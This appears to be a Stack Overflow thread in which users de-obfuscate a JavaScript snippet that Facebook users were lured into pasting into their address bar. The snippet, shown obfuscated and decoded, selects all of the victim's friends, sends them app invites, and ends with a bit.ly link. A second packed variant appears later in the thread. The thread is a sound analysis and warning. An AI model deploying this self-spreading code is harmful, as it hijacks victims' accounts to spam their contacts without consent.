views:

2403

answers:

4

I got a message on facebook telling me to copy and paste this into my adress bar. I thought i'd post it here and see what everyone thinks about it. What does it do? how does it work?

Here's the source code:

// (DO NOT DO THIS!)
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]);
var c=document[a[6]](a[5]);
c[a[8]](a[7],true,true);
void (ss[a[9]](c));
void (setTimeout(function (){fs[a[10]]();} ,4000));
void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000));
void (setTimeout(function (){
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E";
} ,5400));
+18  A: 

Here is the formatted source:

var a = ["innerHTML", 
         "app4949752878_app4949752878_dd", 
         "getElementById", 
         "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>",
         "suggest", 
         "MouseEvents", 
         "createEvent", 
         "click", 
         "initEvent", 
         "dispatchEvent", 
         "select_all", 
         "sgm_invite_form", 
         "/ajax/social_graph/invite_dialog.php", 
         "submitDialog"];

void (document[a[2]](a[1])[a[0]] = a[3]);
var ss = document[a[2]](a[4]);
var c = document[a[6]](a[5]);
c[a[8]](a[7], true, true);
void ss[a[9]](c);
void setTimeout(function () {fs[a[10]]();}, 4000);
void setTimeout(function () {SocialGraphManager[a[13]](a[11], a[12]);}, 5000);
void setTimeout(function () {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'&gt;Completed! Click here</a>";}, 5400);

The a array holds all strings used by the code.
Here it is with the strings put back in place:

void (document.getElementById('app4949752878_app4949752878_dd').innerHTML =  "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");
var ss = document.getElementById("suggest");
var c = document.createEvent("MouseEvents");
c.initEvent("click", true, true);
void ss.dispatchEvent(c);
void setTimeout(function () {fs.select_all();}, 4000);
void setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
void setTimeout(function () {
    document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'&gt;Completed! Click here</a>";
}, 5400);

Finally, here it is with decent names and structure:

var messageElement = document.getElementById('app4949752878_app4949752878_dd');

messageElement.innerHTML = 
    "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";

var suggestLink = document.getElementById("suggest");
var mouseEvent = document.createEvent("MouseEvents");
mouseEvent.initEvent("click", true, true);
suggestLink.dispatchEvent(mouseEvent);


setTimeout(function () { fs.select_all(); }, 4000);
setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
setTimeout(function () {
    messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'&gt;Completed! Click here</a>";
}, 5400);
SLaks
thanks. thats helpfull. What does it do though?
David
Please wait while I translate it.
SLaks
sure. Thanks for doing that.
David
It looks like a cheap way of selecting all of your friends and inviting them to use the app.
Danten
Danten's got it, although I guessed that as soon as I read it was from facebook
Domenic
so whats all the X##/X##/X## stuff thats in a in the original source code?
David
They are encoded characters: \x65 = e
M28
SLaks what tools did you use to translate this?
Yar
@yar: Firebug. `alert(function() { any source });`
SLaks
The interesting thing is how many people actually fell for it - 13K! And it includes people from UK, US and Australia. See the report over here - http://bit.ly/info/bTl0vj
sri
@SLaks, I'm glad I asked, thanks for that.
Yar
+4  A: 

I always find this sort of thing interesting because it shows various ways people use to try and get around security or entice others to do something stupid.

My "Golden rule" is that things like this are always something very dodgy and best ignored. Nothing legit requires this sort of hacking, at the very least it probably contravenes some site policy. At the very worst you get hacked and your computer or online identity used and abused or your bank accounts drained.

Derek Clarkson
A: 

Very interesting. How did you go about decoding it though?

I got something like this just now, but it didn't look like the sametype of content. Part of the code (the latter half) is below. I didn't know if I should paste the entire code. Newbie here.

 (new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();
V.K.
A: 

Something very similar is used by a live(!) Facebook worm I discovered today: search for "Fact, all girls tell these 10 lies to men when they are cheating" if you want to have a look.

This worm has a strange way of reproducing itself, as it required the user to do a certain sequence of keystrokes that copies the payload into the address bar. It starts with Ctrl + C, Alt, ... The interface for this is very intuitive, the worm detects when the required keys are pressed (Ctrl, C, Alt, etc) and gives visual feedback to the victim, that they are doing "well" :)

I already report the application as spam. Is there any better way to report a Facebook worm?

Catalin Hritcu
This doesn't go here and it is not a programming question. ; )
rlb.usa